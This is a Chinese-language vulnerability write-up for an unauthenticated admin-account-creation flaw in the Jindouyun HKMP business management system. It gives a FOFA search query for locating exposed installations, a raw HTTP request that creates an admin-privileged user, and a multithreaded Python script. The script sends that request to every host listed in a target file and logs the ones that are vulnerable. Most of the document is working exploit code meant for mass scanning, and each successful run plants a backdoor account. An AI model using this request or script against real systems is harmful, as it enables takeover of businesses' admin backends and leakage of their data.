漏洞描述
金斗云 HKMP是一款由金斗云软件科技(深圳)有限公司开发的智慧商业管理系统,旨在帮助企业实现高效经营和数字化转型。 金斗云 HKMP智慧商业软件 /admin/user/add 接口存在任意用户创建漏洞,未经身份验证的远程攻击者可以利用此漏洞创建管理员账户,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。
漏洞危害
未经身份验证的远程攻击者可以利用此漏洞创建管理员账户,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。
fofa
body="金斗云 Copyright"
poc
POST /admin/user/add HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
{"appId":"hkmp","mchId":"hkmp","deviceId":"hkmp","timestamp":1719305067,"nonce":5223015867,"sign":"hkmp","data":{"userCode":"aaaa","userName":"aaaa","password":"aaaa","privilege":["1000","8000","8010","2000","2001","2010","7000"],"adminUserCode":"admin","adminUserName":"系统管理员"}}
脚本
import requests
import threading
from urllib.parse import urlparse
import urllib3
# 禁用SSL警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def POC_1(target_url):
parsed_url = urlparse(target_url)
host = parsed_url.netloc
vuln_url = target_url + "/admin/user/add"
headers = {
"Host": host,
"Content-Type": "application/json;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0",
"X-Requested-With": "XMLHttpRequest",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate"
}
data = {
"appId": "hkmp",
"mchId": "hkmp",
"deviceId": "hkmp",
"timestamp": 1719305067,
"nonce": 5223015867,
"sign": "hkmp",
"data": {
"userCode": "aaaa",
"userName": "aaaa",
"password": "aaaa",
"privilege": ["1000", "8000", "8010", "2000", "2001", "2010", "7000"],
"adminUserCode": "admin",
"adminUserName": "系统管理员"
}
}
try:
response = requests.post(url=vuln_url, headers=headers, json=data, timeout=5, verify=False)
if response.status_code == 200 and "成功" in response.text:
with open("存在漏洞的url.txt", 'a', encoding='UTF-8') as f:
print(f"\033[32m[o] 目标 {target_url} 存在漏洞")
f.write(target_url + "\n")
else:
print(f"\033[31m[x] 目标 {target_url} 不存在漏洞")
except Exception as e:
print(f"\033[31m[x] 请求失败 {target_url}: {e}")
def main():
threads = []
with open("./target.txt", "r", encoding='UTF-8') as f:
for line in f:
ip = line.strip()
thread = threading.Thread(target=POC_1, args=(ip,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if __name__ == "__main__":
main()